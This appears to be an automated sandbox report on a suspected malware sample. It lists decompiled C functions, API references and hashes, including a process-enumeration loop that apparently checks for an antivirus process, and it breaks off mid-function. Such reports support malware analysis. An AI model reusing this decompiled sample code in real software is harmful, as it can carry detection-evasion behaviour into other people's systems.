0x02b8204c
0x02b82050
0x02b82050
0x02b81ddd
0x02b81de2
0x02b81dfa
0x02b82032
0x02b8203c
0x00000000
0x02b81e00
0x02b81e00
0x02b81e01
0x02b81e06
0x02b81e1c
0x02b81e08
0x02b81e08
0x02b81e15
0x02b81e15
0x02b81e1e
0x02b81e27
0x02b81e29
0x02b81e33
0x02b81e38
0x02b81e38
0x02b81e33
0x02b81e3f
0x02b81e55
0x02b81e41
0x02b81e41
0x02b81e4e
0x02b81e4e
0x02b81e59
0x02b81e5b
0x02b81e65
0x02b81e6a
0x02b81e6a
0x02b81e65
0x02b81e71
0x02b81e87
0x02b81e73
0x02b81e73
0x02b81e80
0x02b81e80
0x02b81e8b
0x02b81e8d
0x02b81e97
0x02b81e9c
0x02b81e9c
0x02b81e97
0x02b81ea3
0x02b81eb9
0x02b81ea5
0x02b81ea5
0x02b81eb2
0x02b81eb2
0x02b81ebd
0x02b81ebf
0x02b81ec9
0x02b81ece
0x02b81ece
0x02b81ec9
0x02b81ed5
0x02b81eeb
0x02b81ed7
0x02b81ed7
0x02b81ee4
0x02b81ee4
0x02b81eef
0x02b81ef1
0x02b81efb
0x02b81f00
0x02b81f00
0x02b81efb
0x02b81f07
0x02b81f1d
0x02b81f09
0x02b81f09
0x02b81f16
0x02b81f16
0x02b81f21
0x02b81f34
0x02b81f34
0x00000000
0x02b81f23
0x02b81f23
0x02b81f2d
0x00000000
0x02b81f3e
0x02b81f3e
0x02b81f40
0x02b81f56
0x02b81f42
0x02b81f42
0x02b81f4f
0x02b81f4f
0x02b81f5a
0x02b81f5c
0x02b81f5f
0x02b81f60
0x02b81f67
0x02b81f69
0x02b81f6a
0x02b81f6a
0x02b81f67
0x02b81f71
0x02b81f87
0x02b81f73
0x02b81f73
0x02b81f80
0x02b81f80
0x02b81f8b
0x02b81f99
0x02b81fa3
0x02b81fa3
0x02b81fab
0x02b81fc1
0x02b81fad
0x02b81fad
0x02b81fba
0x02b81fba
0x02b81fc5
0x02b81fd8
0x02b81fd8
0x02b81fdd
0x02b81fe3
0x00000000
0x02b81fc7
0x02b81fca
0x02b81fcf
0x02b81fd6
0x02b81fe8
0x02b81fea
0x02b82000
0x02b81fec
0x02b81fec
0x02b81ff9
0x02b81ff9
0x02b82004
0x02b82010
0x02b82015
0x02b82015
0x02b82006
0x02b82009
0x02b82009
0x02b82023
0x02b82028
0x02b8202e
0x00000000
0x02b82031
0x00000000
0x02b81fd6
0x02b81fc5
0x02b81f2d
0x02b81f21

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81E2F
StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81E61
StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81E93
StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81EC5
StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81EF7
StrToIntExA.SHLWAPI(00000000,00000000,?,02B8A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02B81F29
HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02B82028
HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02B8203C

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0666d42fbc018bfd2c686a364b077410650b30332718ebd449e74c029d5e9b9f
Instruction ID: c7084d22ea9343a4e61550a0ec7b1827214752fab4cf0c596b7bf82c350e01a0
Opcode Fuzzy Hash: 0666d42fbc018bfd2c686a364b077410650b30332718ebd449e74c029d5e9b9f
Instruction Fuzzy Hash: CC819F71E22104ABCB10FBBCCD84D9B76EEEB58744B284DA6E50DD7204EB75D952CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02B854D8 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B854D8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2b8a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2b8a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2b8a2f8 = _t6;
					 *0x2b8a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2b8a2f4 = _t7;
					if(_t7 == 0) {
						 *0x2b8a2f4 =  *0x2b8a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02b854e0
0x02b854e6
0x02b854ed
0x00000000
0x02b85547
0x02b854ef
0x02b854f7
0x02b85504
0x02b85504
0x02b85544
0x00000000
0x02b85544
0x02b85506
0x02b85506
0x02b8550b
0x02b8551d
0x02b85522
0x02b85528
0x02b8552e
0x02b85535
0x02b85537
0x02b85537
0x00000000
0x02b8553e
0x02b85500
0x00000000
0x00000000
0x02b85502
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02B85037,?), ref: 02B854E0
GetVersion.KERNEL32 ref: 02B854EF
GetCurrentProcessId.KERNEL32 ref: 02B8550B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B85528
GetLastError.KERNEL32 ref: 02B85547

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: a5124d503c7da9eebec65b1662f87b322f43d450ac3be69f9c574b887af74989
Instruction ID: af89e988b181ce4498147a8effc92c0175e7f83ea2f527ea9b3c84dcf84e7086
Opcode Fuzzy Hash: a5124d503c7da9eebec65b1662f87b322f43d450ac3be69f9c574b887af74989
Instruction Fuzzy Hash: 8FF031F09C0702DBDB349F24AC1ABA43BA2E704791F614856E55ED72C1D77590A0CB15

Uniqueness

Uniqueness Score: -1.00%

Function 02B830D5 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02B830D5() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2b8a348; // 0x29fd5b8
						_t2 = _t9 + 0x2b8be88; // 0x73617661
						_push( &_v264);
						if( *0x2b8a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02b830e0
0x02b830ea
0x02b830ee
0x02b830f8
0x02b83129
0x02b830ff
0x02b83104
0x02b83111
0x02b8311a
0x02b83131
0x02b8311c
0x02b83124
0x00000000
0x02b83124
0x02b83132
0x02b83133
0x00000000
0x02b83133
0x00000000
0x02b8312d
0x02b83139
0x02b8313e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02B830E5
Process32First.KERNEL32(00000000,?), ref: 02B830F8
Process32Next.KERNEL32(00000000,?), ref: 02B83124
CloseHandle.KERNEL32(00000000), ref: 02B83133

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c10c57c1cf3f7fa1684b080fee2a1820bac4ba657111c0423f885eb9933c594f
Instruction ID: d442a069667cb05f82308b3cf58cba5b2505c2b9368d52d696d76293edc0d58f
Opcode Fuzzy Hash: c10c57c1cf3f7fa1684b080fee2a1820bac4ba657111c0423f885eb9933c594f
Instruction Fuzzy Hash: 3CF090325011646BDB20B666DC49EFB76ACDB85B50F0100E2EA4DD3100EB24CA9ACAA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B6092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 02B609DC, 02B609DF, 02B609E4
., xrefs: 02B6095F
l, xrefs: 02B60966

Memory Dump Source

Source File: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b60000_server.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5e31832dfd3e3ba3dca0c659a631322c133822f2b4f8587b56e84c8d2def5844
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: D93169B6900609CFDB10DF99C884BAEBBF6FF08324F14458AD941A7350D775EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B816DF Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E02B816DF(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x02b816e2
0x02b816ed
0x02b816f0
0x02b816f3
0x02b816f4
0x02b81712
0x02b81714
0x02b81717
0x02b8171a
0x02b8171a
0x02b8171d
0x02b8171d
0x02b81720
0x02b81720
0x02b81723
0x02b81723
0x02b81740
0x02b81743
0x02b81759
0x02b8175c
0x02b81776
0x02b81779
0x02b8178f
0x02b81792
0x02b81794
0x02b817ac
0x02b817af
0x02b817b2
0x02b817ca
0x02b817cd
0x02b817e7
0x02b817ea
0x02b81800
0x02b81803
0x02b81805
0x02b8181d
0x02b81822
0x02b81825
0x02b8183b
0x02b8183e
0x02b81858
0x02b8185b
0x02b81871
0x02b81874
0x02b81876
0x02b81891
0x02b81894
0x02b818ab
0x02b818ae
0x02b818b2
0x02b818cb
0x02b818ce
0x02b818d0
0x02b818d3
0x02b818ee
0x02b818f1
0x02b8190a
0x02b8190d
0x02b8191d
0x02b81920
0x02b81938
0x02b8193b
0x02b81955
0x02b81958
0x02b81970
0x02b81973
0x02b81989
0x02b8198c
0x02b819a4
0x02b819a7
0x02b819bf
0x02b819c2
0x02b819dc
0x02b819df
0x02b819f5
0x02b819f8
0x02b81a10
0x02b81a13
0x02b81a2d
0x02b81a30
0x02b81a48
0x02b81a4b
0x02b81a61
0x02b81a64
0x02b81a7c
0x02b81a7f
0x02b81a97
0x02b81a9a
0x02b81aac
0x02b81aaf
0x02b81ac1
0x02b81ac4
0x02b81ad6
0x02b81ad9
0x02b81add
0x02b81aed
0x02b81af0
0x02b81afe
0x02b81b01
0x02b81b13
0x02b81b16
0x02b81b2a
0x02b81b2d
0x02b81b2f
0x02b81b3f
0x02b81b42
0x02b81b54
0x02b81b57
0x02b81b65
0x02b81b68
0x02b81b7a
0x02b81b7d
0x02b81b81
0x02b81b91
0x02b81b94
0x02b81ba6
0x02b81ba9
0x02b81bb7
0x02b81bba
0x02b81bcc
0x02b81bcf
0x02b81be1
0x02b81be4
0x02b81bf8
0x02b81bfb
0x02b81c0f
0x02b81c12
0x02b81c26
0x02b81c29
0x02b81c3d
0x02b81c40
0x02b81c54
0x02b81c57
0x02b81c6b
0x02b81c70
0x02b81c82
0x02b81c85
0x02b81c99
0x02b81c9c
0x02b81cb0
0x02b81cb3
0x02b81cc9
0x02b81ccc
0x02b81ce0
0x02b81ce3
0x02b81cf5
0x02b81cf8
0x02b81d0c
0x02b81d0f
0x02b81d23
0x02b81d26
0x02b81d3a
0x02b81d43
0x02b81d46
0x02b81d4f
0x02b81d58
0x02b81d60
0x02b81d68
0x02b81d72
0x02b81d87

APIs

memset.NTDLL ref: 02B81D7B

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction ID: aa142b30e7420cdd3e0769c26267fe0358278794622473b10452669f951f625d
Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction Fuzzy Hash: 6222857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 02B88551 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B88551(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2b8a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2b8a3c8 = 1;
										__eflags =  *0x2b8a3c8;
										if( *0x2b8a3c8 != 0) {
											goto L60;
										}
